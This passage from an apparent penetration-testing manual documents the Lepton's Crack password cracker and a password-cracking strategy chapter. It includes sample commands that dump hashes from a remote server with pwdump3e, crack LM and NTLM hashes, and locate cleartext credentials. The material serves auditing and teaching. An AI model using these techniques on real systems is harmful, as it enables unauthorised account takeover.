(Note that this is a continuation of the session interrupted above).
And now using session names you can assign different names to different sessions, and
interrupt and continue them individually.
Page 315 of 1123
C.10.22
Lepton's
Use of Lepton's Crack
Crack
is
a
free
open
source
product
you
can
download
from
http://freshmeat.net/projects/lcrack/
It's always recommended to check which one if the latest source code (stable branch or
development branch) and get this one. Please also read the CHANGES and README
documents for latest additions and enhancements.
In order to compile Lepton's Crack from source you can use Linux, Cygwin
(www.cygwin.com) or MingW for Windows, or even Visual C. The main development
platform is Linux, and it's tested mainly in Linux and Cygwin.
This is what you see when launching Lepton's Crack:
N:\cygwin\usr\local\lcrack-20040914>lcrack
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
lcrack: method must be specified (-m), exiting..
usage: lcrack [-q | -v] -m <method> [<opts>] <file> ..
-o <file>
: output password file
-d <file>
: use word list from <file>
-t <file>
: use pre-computed word list from <file>
-s <charset> : use specified charset for incremental
-s# <name>
: use charset from charset.txt file
-l <lenset> : use specified length-set for incremental
-g <regex>
-g# <name>
: enumerate regex for incremental
: use regex from regex.txt file
-x<mode>[+|-] : activate/deactivate specified mode
mode = l
: login mode
mode = f
: fast word list mode
mode = s
: smart word list mode
mode = b
: incremental (brute-force) mode
-stdin
: stdin (external) mode
Page 316 of 1123
-rand
: randomized brute-force mode
-h
: display usage information and exit
<method>
: hash algorithm, one of:
{ 'dom' 'md4' 'md5' 'nt4' 'null' 'sha1' }
Note: the above is the latest development version at the time of this writing (20040914),
and the LM support was briefly deactivated to rework it. If you need LM support use v1.1
or wait for the next version.
The format of the encrypted/hashed password file expected by Lepton's Crack is as
follows:
USERID:PASSWORD[:anything]
Anything after the hash will be ignored, so you can use this space to put any comments
you like.
When cracking you HAVE to specify the mode:
-x<mode>[+|-]
Where <mode> can be:
l : login mode (tries the userid, useriduserid)
f : fast wordlist mode, tries dictionary words from the dictionary file provided
s : smart wordlist, tries the dictionary word with case permutation, appending and
suffixing, etc.
b : incremental (bruteforce) mode, tries all combinations of the given character set
You activate a mode with + after the mode, and you deactivate it with a - after the mode.
By default all modes are inactive, this is why you have to specify one.
Example, to activate both login and bruteforce modes you can use:
lcrack -m <method> -xl+ -xb+ crackme.txt
Page 317 of 1123
You also HAVE to specify the method (algorithm) to use:
-m <method>
Where <method> can be:
dom : Domino R4 HTTP hash
md4 : pure MD4 hash
md5 : pure MD5 hash
nt4 : Windows NTLM (Unicode/MD4)
sha1 : pure SHA1 hash
lm : Windows LM (not available in the development version shown above, but normally
available)
(More algorithms to be expected in the near future)
So to activate bruteforce crack of Domino R4 HTTP hashes:
lcrack –m dom –xb+ crackmeLOTUS.txt
Other options are not required or have default values, so it's not necessary to specify
them all the time.
If you want to use a given charset (for example only lowercase letters) you can either
use the modifier -s followed by the charset to use:
-s a-z
or put that charset into a text file (for example charset.txt) and specify to use this file with
the modifier -s# filename:
-s# charset.txt
Page 318 of 1123
The specification of the charset is very flexible. You select only some characters of a
given set, for example only lowercase letters from a to h, then x and z (remember that
this can also be stored in a file as explained above):
-s a-hxz
This example contemplates all lowercase and uppercase letters plus all digits:
-s a-zA-Z0-9
and finally you can specify any character with their ASCII code in hexadecimal, octal or
decimal (even \x00 can be used):
-s a-z0-9\x20
The example above indicates all lowercase letters, all digits and the space (ASCII code
\x20 = 32 = space).
Hexadecimal number are indicated by \x, octal numbers by \O and decimal by \ alone.
Please remember to escape the \ if your command interpreter has a special meaning for
it (like Bash, were you escape it with an additional \, so hexadecimal numbers will be \\x,
etc.)
The most powerful functionality of Lepton's Crack is the use of REGEX (Regular
Expressions).
You can specify what do you want in any position of the password.
Let's explain with an example. If you know that a given password starts with a letter in
the left side of the keyboard, then a letter on the right side, followed by two letters on the
top side and a number from the keypad, you can implement a REGEX to tell Lepton's
Crack about that:
-g [qwerasdfyxcv][poiulkjhmn] [qwerasdfyxcv] [qwerasdfyxcv]0-9
This way we tell Lepton's Crack that the fist, third and fourth characters of our password
is one of qwerasdfyxcv, the second one is one of poiulkjmn, and the last one is a digit.
Page 319 of 1123
This can be VERY helpful in two situations:
a) when you see the hands of someone typing the password, but not the keys
pressed
b) when you know part of the password, a typical example is knowing the second
half of a LM password
REGEXes can also be stored in a file (for example regex.txt) in a similar way to the
charset as explained above, and referenced with:
-g# regex.txt
This way you can store useful REGEXes for future use.
To end with the REGEX concept, you can also use the * wildcard to specify one or more
characters (any character) at a given position in the password. In this case the -l modifier
that usually specifies the total length of the password will specify only the length of this
variable section.
Page 320 of 1123
Example, if you know that the password starts with 'pa' and ends with 'ord', but you don't
know what's in the middle, you can do:
N:\cygwin\usr\local\lcrack-20040914>lcrack -m dom -xb+ -g pa[*]ord password_test
_DomR4.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized (domino HTTP hash) module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
(dbg) regex 'pa[*]ord'
loaded: REGEX = [p][a][*][o][r][d]
dbg: loading 'password_test_DomR4.txt'
mode: null password, loaded 1 password
mode: incremental (regex, ordered), loaded 1 password
(dbg) rx_enum(len = 8)
found: login(test), passwd(password)
Lapse: 0.354s, Checked: 38663, Found: 1/1, Speed: 109217 passwd/s
The wordlist attack is implemented by providing a dictionary with the modifier -d:
-d dictionary.txt
The format of the dictionary is very simple, a word per line. It doesn't matter if it's sorted
or not, but it's usually a good practice to keep dictionaries sorted to ease browsing and
addition of new words.
This is an example of a dictionary attack on some NTLM hashes:
N:\cygwin\usr\local\lcrack-20040914>lcrack
-m
nt4
-xf+
-d
monster_sorted.txt
crackmeNTLM.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
Page 321 of 1123
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized 'NT md4/unicode' module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
dbg: loading 'crackmeNTLM.txt'
mode: null password, loaded 3 passwords
mode: fast dictionary search, loaded 3 passwords
KEY: gevangenneming
got Ctrl-C signal, exiting...
Lapse: 14.261s, Checked: 7769589, Found: 0/3, Speed: 544813 passwd/s
Note that a dictionary file (monster_sorted.txt) was specified, also the fast wordlist mode
(-xf+), NTLM method (-m nt4) and finally the file with the hashes (crackmeNTLM.txt).
All debugging information goes to stderr (the screen by default), while all passwords
found goes to stdout (the screen by default). You can redirect any or both to one or more
files with simple pipes.
Above you can see that the default charset when you don't specify one is all the
lowercase letters plus all digits, and the default length is 8 characters.
Finally, in Lepton's Crack you can use rainbow table cracking.
To do that you've to generate the rainbow tables for the given algorithm using the
program mktbl (part of Lepton's Crack distribution):
N:\cygwin\usr\local\lcrack-20040914>..\..\..\bin\cat password.txt | mktbl.exe –m dom
rt_passwords
xtn: initialized (domino HTTP hash) module
The above example sends (with cat) the wordlist to mktbl.exe for processing, the
program is creating a Domino R4 rainbow table (-m dom, as in lcrack usage) and the
output table will be found in the rt_passwords file.
Page 322 of 1123
This pre-computed table can then be used with Lepton's Crack as in the following
example:
N:\cygwin\usr\local\lcrack-20040914>lcrack
-m
dom
-xf+
-t
rt_passwords
password_test_DomR4.txt
-= [ Lepton's Crack ] =- Password Cracker [Sep 16 2004]
(C) Bernardo Reino (aka Lepton) <lepton@runbox.com>
and Miguel Dilaj (aka Nekromancer) <nekromancer@eudoramail.com>
xtn: initialized (domino HTTP hash) module
loaded: CSET[36] = { 0123456789abcdefghijklmnopqrstuvwxyz }
loaded: LSET[8] = { 1 2 3 4 5 6 7 8 }
dbg: loading 'password_test_DomR4.txt'
mode: null password, loaded 1 password
mode: fast pre-computed table, loaded 1 password
found: login(test), passwd(password)
Lapse: 0s, Checked: 2, Found: 1/1, Speed: 0 passwd/s
Rainbow tables for other algorithms are generated in a similar. It's our goal to implement
the LM rainbow table usage in such a way to make it compatible with tables generated
with winrtgen (www.oxid.it) because it has been the "de facto" tool in use for some time
now, and we can profit from already generated tables.
To complete the exposition on Lepton's Crack, I'll mention that there's a GUI frontend
available for it, courtesy of Matteo Brunati (http://www.nestonline.com/lcrack/lcFE.htm)
C.10.23
Result Analysis / Conclusion / Observation
All simple passwords will fall to an attack, even if the encryption used is strong, because
dictionary based attack is fast to find simple words used as passwords.
Even slightly modified words will fail to the "clever" modes of at least John the Ripper,
Lepton's Crack, LC5 and other crackers, so 'password123' is not really too much
stronger than 'password'.
Page 323 of 1123
Complex passwords will theoretically fall prey to the attacker, but if the encryption
algorithm in use is strong it can take too long a time, making it unfeasible to recover
them.
In the case above, slow and progressive generation of more and more complete rainbow
tables will speed up the process enormously, because in the case of rainbow cracking
you don't lose time re-generating the hash, all the time used is that needed to do a parse
in the table until the given hash is found, and then retrieving the plain text password
associated with it.
C.10.24
Countermeasure(s)
Implement strong encryption algorithms, but accompany that with strong user education
(to ensure that they know how to chose a good password) AND password auditing to
detect weak (crackeable) passwords and enforcing their change.
C.10.25
Further Reading (Links)
C.10.26
Contributor(s)
Bernardo Reino (aka Lepton)
Piero Brunati
Matteo Brunati
Page 324 of 1123
D PASSWORD CRACKING STRATEGIES
D.1 INTRODUCTION
This document describes the password cracking phase for use by Penetration Testers
and Auditors. It is aimed at beginners to intermediate professionals.
A PenTester’s differs from an Auditor’s password cracking only in the first phase. While
an Auditor usually has the rights to get all password hashes and users information, a
PenTester must “hunt” for them. After this gathering phase, the password cracking
phase proceeds in a similar way for both Auditors and PenTesters.
Please note this document introduces tools and techniques valid at the time of writing,
but giving the fast evolution of software and related security world, it is recommended to
always complement this document with internet searches. While the techniques
explained here probably will remain valid for some years, tools and details are evolving
quickly, so please use search engines and don’t miss the latest breaking news.
I made every effort to synthesize this document, but it can’t be too short: to succeed in
password cracking, before knowing how to use the tools, you must know why you use
them.
D.2 PASSWORD TYPES
What do we mean for Password Cracking? Well, let me introduce the argument by
explaining the main password types: Cleartext, Obfuscated and Hashed. While only
hashed passwords need cracking, other password types can help in the cracking phase.
D.2.1 Cleartext passwords
A cleartext password is a password stored on some media, or sent over the wire (and
wireless!) as it is typed, without any modification.
For example, you can find some cleartext passwords stored in Linux files such as
/etc/wvdial.conf, /etc/squid/squid.passwd, etc.
Page 325 of 1123
Windows Registry houses some well known cleartext passwords, such as the automatic
logon password (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon).
Widely used protocols as Telnet, FTP, HTTP, POP3, SMTP, IMAP, use cleartext
passwords which can be sniffed over the wire. Note: switched networks do not represent
useful protections against sniffers.
HTTPS and SSL use cleartext passwords over an encrypted protocol, but if certificates
aren’t correctly verified these protocols are vulnerable to a MiM (Man in the Middle)
attack so we can consider them as cleartext. SSH1 (and SSH2 if the sniffer changes the
banner to trick the client it can use only SSH1 authentication – see Ettercap
documentation) suffers a similar vulnerability if public keys aren’t protected adequately
and systems aren’t configured to negotiate only v2 protocols.
Note:
Cain
(Windows,
http://www.oxid.it
)
and
Ettercap
(Linux,
Windows,
http://ettercap.sourceforge.net/ ) are some simple tools to sniff cleartext passwords even
on switched networks. Both tools supports MiM sniffing.
Cleartext passwords don’t need to be cracked, so why they are relevant to password
cracking? Because cleartext passwords are a precious source of information. They
should be added to dictionaries used later in the cracking phase. Moreover, every
cleartext password discovered can aid in discovering how security is managed and can
help determining the cracking tactic described later.
D.2.2 Obfuscated passwords
Some passwords are stored or communicated after a more or less complex
transformation. This transformation is reversible, so after applying an algorithm the
password becomes unreadable, and after applying the appropriate reverse algorithm to
the “unreadable” password, it returns cleartext. We call this process “obfuscation”.
Some samples of obfuscated passwords are Windows dialup passwords, MS Terminal
Server passwords stored by the client, Enterprise Manager passwords, RSA SecurID
tokens, passwords hidden in a “protected” input field, Cisco Type-7 passwords, MS
Access passwords, and those stored by VNC (Virtual Network Computing, an
OpenSource remote control software). Cain and other free tools can reverse all these
passwords.
Page 326 of 1123
Since in this realm discoveries are frequent, I suggest that you search the internet often
for updated obfuscated password crackers. From our password cracking point of view,
decipherable obfuscated passwords, are exactly the same thing as cleartext passwords.
D.2.3 Hashed passwords
To a casual viewer, obfuscated passwords and hashed passwords seem very similar,
but while the first are reversible the second are transformed using a not-reversible
algorithm: a hashing algorithm.
Commonly used password hashing algorithms include DES (Windows LM, Old Linux),
MD4, MD5 (FreeBSD, Linux), SHA-1, MS Kerberos 5 Pre-authentication (.NET), etc.
Here are the hashes obtained applying different hashing algorithms to the string Hello:
MD2
B27AF65E6A4096536DD1252E308C2427
MD4
A58FC871F5F68E4146474AC1E2F07419
MD5
8B1A9953C4611296A827ABF8C47804D7
SHA1
F7FF9E8B7BB2E09B70935A5D785E0CC5D9D0ABF0
RIPEMD160
D44426ACA8AE0A69CDBC4021C64FA5AD68CA32FE
LM
FDA95FBECA288D44
NT
916A8E7B1540EC179F196F8DDB603D85
MySQL323
678AE96238440307
MySQLSHA1
FCA02337EEB51C3EE398B473FD9A9AFD093F9E64
Cisco PIX
SuWDMy2/slBAhIms
Being mathematically not-reversible, hashes are considered secure and stored on
devices and sent over the wire. From an Auditor point of view, they are more or less
public. In fact everyone who is attached to a network can sniff hashes, and systems
administrators generally can look at the files containing hashes used by authentication
systems and stored on most of the servers.
But while hashes are mathematically not-reversible, a given hash derived from a weak
password is reversible in a reasonable amount of time by trying to hash a series of
passwords and comparing each resulting hash with the given hash. Same hash means
Page 327 of 1123
same
password
(below
more
about
collisions).
This is what is commonly called password cracking.
When authenticating, a classic authentication system hashes the password (i.e. typed on
the keyboard) and compares it with the stored hash: if they match the password is
assumed correct and the login proceeds.
D.2.3.1 “NOT SALTED” PASSWORDS
Some authentication systems apply the hashing algorithm directly to the password,
without applying additional security tricks. Among others, Windows LM, NTLMv1,
NTLMv2 and MS Kerberos 5 Pre-authentication (.NET), all use this technique.
D.2.3.1.1 UNIQUENESS
The major flaw of such technique is the lack of uniqueness: if two users have the same
password they will have the same hash.
Windows LM hash, which at the time of this writing for compatibility purposes is still
saved on Windows Server 2003 with only the Kerberos 5 authentication enabled, eases
the password cracking more by transforming the password to uppercase before hashing
it: this way two users have the same hash even if they use different passwords, derived
from the same world but with different upper/lower cases. Despite, since NT4, Microsoft
recommends the password must be at least mixed case plus numbers or symbols,
PassWord and pAsSwOrD generate the same LM hash. Once the LM hash have been
cracked, that is knowing the case insensitive password, the case sensitive one is
calculated instantly using the NTLM hash. An example is in the “Dictionary” cracking
chapter.
D.2.3.1.2 CRACKING SPEED
LM is weaker than other schemes because it uses only one DES cycle to hash a
password. This is why LM cracking speed even on an old Pentium 3 PC is measurable in
millions pwd/sec, while for NTLM the measure is one order of magnitude smaller. On the
same PC, FreeBSD and Linux cracking speed is measured in thousands pwd/sec.
Page 328 of 1123
Another weakness of not-salted algorithms is about the brute-force cracking speed: for
not-salted passwords the brute-force proceeds almost at the same speed independently
of the number of hashes to be cracked. For example, a software which “brutes” a single
LM password at 5 millions pwd/sec, can “brute” thousands of passwords at the same
time without a significant speed decrease.
D.2.3.1.3 PASSWORD CHUNKS
As we will investigate later, LM has another weakness: ASCII passwords shorter than 15
characters are broken into two 7 bytes chunks. For each one its own hash is calculated.
This means passwords which length is among 8 and 14 characters are often simpler or
at least not more complex to crack than 7 characters passwords.
An
interesting
updated
Microsoft
document
is
here:
http://www.microsoft.com/smallbusiness/gtm/securityguidance/articles/select_sec_passw
ords.mspx
D.2.3.2 “SALTED” PASSWORDS
Unlike not-salted passwords, salted passwords are subjected to further processing
during the initial hashing pass. For a C example you can see crypt_md5.c source code
(http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/lib/libcrypt/cryptmd5.c?rev=1.13&content-type=text/plain )
The salt is usually a random string, so if two users have the same password they will not
have the same hash. With this trick the performance of cracking software is divided by
the number of hashes. In these systems the algorithm is slowed down in a way the
authentication speed doesn’t notably suffer, but the cracking speed is agonizing.
An example of such scheme is the one used in OpenBSD, FreeBSD and Linux. As you
can see inside the sources (crypt_md5.c) the password is hashed against different
strings before a final hashing loop where the cracking speed is lowered typically by a
factor of 1000 (FreeBSD, Linux) or even more (in OpenBSD the loop count is
configurable).
Page 329 of 1123
Note: This is a classic argument to demonstrate how OpenSource is more secure than
Closed Source software. Even the old *nix DES passwords are orders of magnitude
more secure than “recent” LM and NTLM ones.
The same computer which “brutes” thousands of LM hashes at 5 millions pwd/sec,
brutes a single Linux hash at 4700 pwd/sec, two Linux hashes at 2350 pwd/sec, 100
Linux hashes at 47 pwd/sec, and so on…
This introduces an argument which can be useful in the information gathering phase and
in the cracking phase (see later): while the success probability increases without
affecting the cracking time by augmenting the quantity of not-salted hashes, with salted
hashes you must choose which hashes to concentrate the cracking on, discarding the
hashes you “feel” don’t give you the best success chance: for example trying to quickly
crack users with simple passwords and then escalate privileges, or trying directly to
crack fewer (and maybe smarter) admin passwords.
D.2.3.3 COLLISIONS
Since the authentication algorithm compares the hash from the password with the stored
hash, for some weak hashing algorithms it is possible in theory to find an arbitrary
password which produces a given hash. This is called “collision”.
Supposedly, if for some hashing algorithm the passwords “Michael” and “Peter” give the
same hash, they are interchangeable. The authentication system will accept both
passwords if they corresponds to the same stored hash.
Recently some “humanly-timed” collisions calculation algorithms have been discovered
on MD5, but at the time of this writing they don’t seem applicable to the password
cracking world.
D.3 TOOLS
D.3.1 John the Ripper
JtR (http://www.openwall.org ) is one of the most powerful OpenSource password
crackers. It’s highly configurable and it’s designed to ease the addition of new
algorithms. For an example, you can look at my Win 2000/.NET Kerberos 5 module
here: http://www.nestonline.com/wjohn/dnetk5_fmt.c
Page 330 of 1123
John supports both salted and not-salted hashes, the current version is 1.6.37 which
“out of the box” supports DES, BSDI, MD5, BlowFish, AFS, LM, MySQL, EGG.
While JtR has a good “incremental” password generator which makes it the best choice
for basic password cracking, JtR LM dictionary cracking has some limitations (shown
later in the “Dictionary” crack example).
D.3.2 Lepton’s Crack
By looking at the sources, lcrack seems somewhat simpler than JtR, nonetheless it’s
very powerful thanks to the RegEx feature, with which you can define the charset
independently for each of the characters composing the password.
With lcrack it is possible even to crack passwords containing binary characters (binary
RegEx), and passwords beginning and/or ending with known strings (wildcard RegEx),
features missing from most password crackers which make lcrack the first choice for
“advanced cracking”.
Lepton’s
Crack
is
OpenSource
(http://usuarios.lycos.es/reinob,
http://freshmeat.net/projects/lcrack ) and it’s designed to ease the addition of new
algorithms.
D.3.3 Rainbow Crack
With
his
study
on
time-memory
trade-off
),
Oechslin
(http://lasecwww.epfl.ch/~oechslin/publications/crypto03.pdf
Philippe
(LASEC) definitely demonstrated the security threat deriving from some algorithms using
non-salted passwords such as MD5, LM, NTLM. Please note the old *nix scheme
already used salts with DES, so it is not vulnerable to rainbow cracking.
Oechslin’s study demonstrates how it is possible to pre-compute the hashes for a given
algorithm and charset, obtaining some optimized tables which can be reasonably stored
on today’s mass storage devices, and having a good probability to retrieve quickly (in
some cases almost instantly) the password corresponding to the given hash. This is why
this technique is also called “Instant Cracking”.
There are more than one software which implements Rainbow Cracking, but a special
mention goes to Zhu Shuanglei who was the first to publish a working software (with
sources,
http://www.antsight.com/zsl/rainbowcrack/).
Zhu’s
software
(rcrack)
is
configurable and slightly customizable.
Page 331 of 1123
At the moment, while someone is starting to sell pre-computed tables, others are offering
on-line cracking services (free and commercial).
This solution greatly eases frequent cracking tasks for PenTesters and Auditors, but its
performance is inversely proportional to hash quantity and applicable only to not-salted
hashes.
D.3.4 LC5 (Windows only, commercial)
LC5 has a nice interface and the fastest LM routines I know.
It is a Windows-only application, but it seems to run in Linux under WINE.
Most LC5 features are available in OpenSource and other free software.
D.4 CRACKING STRATEGY
Our strategy depends on our enemy and our resources. A good strategy is a good
starting point to increase the success rate. After acquainting with the techniques
presented here, everyone should be able to define an appropriate strategy for each
specific case.
My generic password cracking strategy is divided into 4 steps. The goal is to prepare the
cracking environment and decide a suitable cracking tactic to get the best results as
quickly as possible.
Please note you must adapt the strategy to each specific case. Here is only a sample,
useful for academic purposes, modeled on Auditing and internal PenTesting needs.
Most external PenTests could benefit only from a subset of this strategy.
An important note: please ensure the techniques you are going to use are compatible
with your “contract” or “mandate”. Sometimes PenTests and Audits are intentionally
limited for whatever reason, management and admin fear included…
D.4.1 Information gathering
Unless we already have the admin password hash and it corresponds to “123” or
“password”, we need to gather as much information as we can about our target.
Page 332 of 1123
All this information should be useful at least to build a specific dictionary, and eventually
to understand more about corporate and admin habits.
Some examples of useful information:
•
Users full names, Departments, and comments available from the server.
Unhardened Windows servers generally give away a lot of information, for
example you can start trying GetAcct (http://www.securityfriday.com/ ).
•
Accounts pertaining to system services. These accounts are often managed
with less care than personal accounts, their password is almost never changed,
they are often replicated on more domains, and sometimes they are configured
by external personnel out of the corporate policies control.
•
Security Policies (see GetAcct and any internal document).
•
Cleartext and obfuscated passwords (sniffed or gathered directly from machines).
Where VNC is used, its password is often the same for a lot of computers, and
having gained user level credentials you can get VNC passwords remotely (see
RegBrws on http://www.securityfriday.com/).
•
Suitable strings from network traffic (see ngrep).
•
Words contained in internal documents.
D.4.2 Investigation
Operating internally, after a bit of investigation you can capture useful data from various
sources:
•
Passwords synchronization systems in use: if any administrative password is
synchronized with an IBM/370 Mainframe, usually the charset is no more
complex than alphanumeric!
•
Admin habits about balancing security with easy access to systems (there are
still admins who believe a secure password is a nuisance, most of them don’t
know how to build an easy and very secure password, and maybe they use their
best password with FTP and Telnet).
•
Corporate choices about encrypted protocols on network devices.
•
Social engineering.
Page 333 of 1123
•
Sticky notes attached to monitors and containing passwords.
•
Etc.
D.4.3 Dictionaries
After gathering as much information as you can, and after investigating on target habits,
you can build dictionaries.
Depending on the tools you will use on subsequent phases, dictionaries may have to be
sorted, without duplicates, and lower/upper case. Please refer to any updated tools
documentation about this issue.
Typical dictionaries would include:
•
Small international (English) and medium local (ex. Italian) dictionaries.
•
Information gathered.
•
Formatted and unformatted dates starting from 60 years ago.
•
The name of soccer/football/basket teams, the name of notorious TV people.
•
Users register codes.
•
Etc.
Depending on the cracking rate (type and quantity of hashes available – see above), you
may want to build two levels of dictionaries: a small one and a big one, so you can use
the first in an interactive cracking phase and, if still needed, use the other for a nightly
batch phase.
D.4.4 Building a cracking tactic
This step is the most critical. Now you have some battlefield scenario and you need to
depict the sequence of attacks.
The tactic highly depends on the type and quantity of hashes available, your available
resources to perform the task, and even the quality of analyzed passwords. It is also
fundamental to correctly evaluate how much processing time (using one or more
computers) you can dedicate to the cracking.
Page 334 of 1123
Expect this step to be very different each time you face a new target. After some
practice you should be able to define very good tactics for each case.
D.5 CRACKING TACTICS
I often see people asking to forums or lists: “Which is the best password cracker to get
rid of this hash?”
By a professional viewpoint, I think this is the wrong question. The right question should
be: “What’s your cracking tactic for this type of hash, and what tools do you prefer?”.
Hints are always a useful starting point, but the final word is constantly up to you.
A good starting point to decide the sequence of phases is to start with the shortest
phases, proceeding then with the longer ones. Phases depends highly on available hash
types and quantity.
The sample tactic shown here is modeled on LM password cracking, supposing a
number of hashes are available either by network or by downloading from a
server.
Tools used here are summarized and referenced in the “tools” section.
Before proceeding with more detail on cracking tactics, you may want to take a look to a
sample
LM
cracking
of
a
complex
password
here:
http://www.nestonline.com/lcrack/index.html
D.5.1 Working Dictionary
LM passwords (or LM half passwords) found in every phase should be added to what I
call a “working dictionary”, a dictionary containing all passwords already found for the
current “job”.
At the end of each phase you should try all your hashes against this working
dictionary. If you found the two halves of the same passwords in two different
phases, this activity will merge the results.
You can use either JtR or Lepton’s for this activity.
Page 335 of 1123
D.5.2 Dictionary
Since the first phase should be the shortest one, you will usually begin with a dictionary
crack, remembering that the cracking time directly depends on the dictionary size (and
for salted hashes it depends also on hash quantity).
Provided it supports the needed algorithm, the fastest tool here is John the Ripper.
JtR has a limitation when dealing with LM passwords: it doesn’t perform useful dictionary
attacks for passwords longer than 7 characters. To overcome this limitation, you can use
Lepton’s
Crack.
A
LM
version
is
in
a
development
branch:
http://www.nestonline.com/lcrack/index.html
C programmers should take a look at Lepton’s Crack “smart dictionary” mode source
code. It’s easy to modify, and you can quickly add your own dictionary “variations”.
As mentioned above, you may want to use two dictionary sets: a smaller and a bigger
one. This is particularly useful when cracking a number of salted hashes (cracking time
strongly dependent on the number of hashes), because the first dictionary set reduces
the uncracked hash quantity, hopefully obtaining a reasonable cracking time for the big
dictionary.
In some cases you may also want to automatically build some dictionaries, i.e. with
dates or specific charset defined in the corporate policy (ex. strong Windows password
filter at the server level).
While “plain” dictionary cracking has a good success rate for some targets, it is a waste
of time for targets using a strong password policy.
As it will be for subsequent phases, it is up to you to evaluate feasibility and usefulness
of this phase depending on cracking rate (hash types and hash quantity) and any
information gathered before.
Here is an example of hash downloading, dictionary cracking and proper case discovery.
Comments are in red.
Dump password hashes from server...
C:\test>pwdump3e \\10.0.0.134 >hashes.txt
pwdump3e (rev 1) by Phil Staubs, e-business technology, 23 Feb 2001
Page 336 of 1123
Copyright 2001 e-business technology, Inc.
[...]
Completed.
C:\test>type hashes.txt
User SID LM 1st half
|
|
|
LM 2nd half
|
NTLM hash
|
user1:1006:e52cac67419a9a224a3b108f3fa6cb6d:593cd653429408f9928045ffa1ad244
3:::
User2:1012:e52cac67419a9a224a3b108f3fa6cb6d:7f48a4e017dac7b03d277f18d57b5f8
c:::
Note: both users have same LM hashes and different NTLM hashes, this means same
word but different case.
Build dictionary...
C:\test>echo password>dictionary.txt
Trying with John the Ripper...
C:\test>wjohn --format=LM --wordlist=dictionary.txt hashes.txt
Loaded 2 password hashes with no different salts (NT LM DES [32/32 BS])
PASSWOR
(user1:1)
guesses: 1 time: 0:00:00:00 100% c/s: 0.00K trying: PASSWOR
Note: only 3 out of 4 half hashes found?
Build LM input file for Lepton’s Crack...
C:\test>echo user1:e52cac67419a9a224a3b108f3fa6cb6d:::>hashesLC.txt
C:\test>echo User2:e52cac67419a9a224a3b108f3fa6cb6d:::>>hashesLC.txt
C:\test>type hashesLC.txt
user1:e52cac67419a9a224a3b108f3fa6cb6d:::
User2:e52cac67419a9a224a3b108f3fa6cb6d:::
Note: User2 hash is redundant here, it is the same as user1!
Fire up Lepton’s Crack...
C:\test>lcrack -q -m lm -xf+ -d "dictionary.txt" hashesLC.txt
xtn: initialized 'LanMan (7,7+7,14 bytes UPPERCASE pwd, libdes+)' module
Page 337 of 1123
dbg: loading 'hashesLC.txt'
user1:PASSWORD
User2:PASSWORD
Lapse: 0s, Checked: 1, Found: 2/6, Rate: 1 cycles/s
Note: all passwords found :-)
Build NTLM input file for Lepton’s Crack...
C:\test>echo user1:593cd653429408f9928045ffa1ad2443 >hashNTLM.txt
C:\test>echo User2:7f48a4e017dac7b03d277f18d57b5f8c>>hashNTLM.txt
C:\test>type hashNTLM.txt
user1:593cd653429408f9928045ffa1ad2443
User2:7f48a4e017dac7b03d277f18d57b5f8c
Discover proper case...
C:\test>lcrack -q -m nt4 -xb+ -g [pP][aA][sS][sS][wW][oO][rR][dD] hashNTLM.txt
xtn: initialized 'NT md4/unicode' module
dbg: loading 'hashNTLM.txt'
user1:PassWord
User2:pAsSwOrD
Lapse: 0s, Checked: 171, Found: 2/2, Rate: 1 cycles/s
Mission accomplished :-)
D.5.3 “Quick and dirty”
Let me know if you have a better name for this phase!
Here I usually try short passwords with a relatively complex charset. Target passwords
(or password chunks) are for example: ()wn3d ws£1 .oO° etc.
This phase is particularly useful when cracking LM, because LM passwords are always
broken into two 7 bytes chunks, so there are chances you will find some “second half” of
passwords longer than 7 as well as some passwords shorter than 8.
This phase itself can be broken into sub-phases of increasing duration, for example:
1. Length = 1 to 7, charset = numeric + date separators
2. Length
For
=
1
example:
to
4,
charset
lcrack
=
–l
alphanum
1-4
+
-s
all
symbols
“
-~”
Page 338 of 1123
(that
means
“the
charset
is
from
space
to
tilde”,
0x20..0x7E)
or modifying john.conf, or building a charset for JtR.
3. Length = 5, charset = numbers and all symbols
4. Length = 5, charset = alphanum + most common symbols
5. Length = 6, charset = alphanum
6. Length = 7, charset = alpha
7. Length = 5 to 7, charset = symbols only
At this point of the tactic, each phase shouldn’t take longer than few minutes.
Remember, these are only examples useful as a starting point, I’m sure after some
experimenting you will find recipes which better suits your needs.
D.5.4 “Incremental”
Dealing with dictionaries, JtR has a nice “incremental” mode which uses a dictionary for
a configurable rule-based password generation. See john.conf and any documentation
available.
At this point of our sample tactic, it could be a good time to do “incremental” cracking.
D.5.5 LM Half Passwords
At this point maybe we have some half-passwords, and maybe we note some half can
help to deduct the other half.
For example, the LM password gr8beethoven is split into gr8beet and hoven . If you
followed my “quick and dirty” example, you found the second half (hoven) at point 5, and
since there aren’t thousands of words ending with “hoven”, it is worth to try if we guess
the beginning.
We can use Lepton’s here, thanks to the RegEx support. A quick search in a dictionary
reveals “Beethoven” is the only word longer than 5 ending with “hoven”. Let’s try with
lcrack: lcrack -s “ -~” -l 3 -g [*][b][e][e][t][h][o][v][e][n]
The length (parameter -l 3 ) refers to the variable length part ( [*] ): it is 3 characters
long, so the whole password will be 12 characters long. With this technique you can
Page 339 of 1123
deduct either the second half by knowing the first half, or the first half by knowing the
second half.
An example showing this technique is here: http://www.nestonline.com/lcrack/index.html
This is why I said LM passwords longer than 7 are often simpler or at least not more
complex to crack than 7 characters passwords.
Please note this phase is placed here in this example, but it makes sense to
perform it whenever after a phase you get “good” password halves.
D.5.6 Basic brute force attempts
When you have a lot of hashes, it is a good idea to purify our hash-pot from as much silly
passwords as we can, before proceeding with “instant” cracking. In fact, instant cracking
time is almost directly proportional to hash quantity.
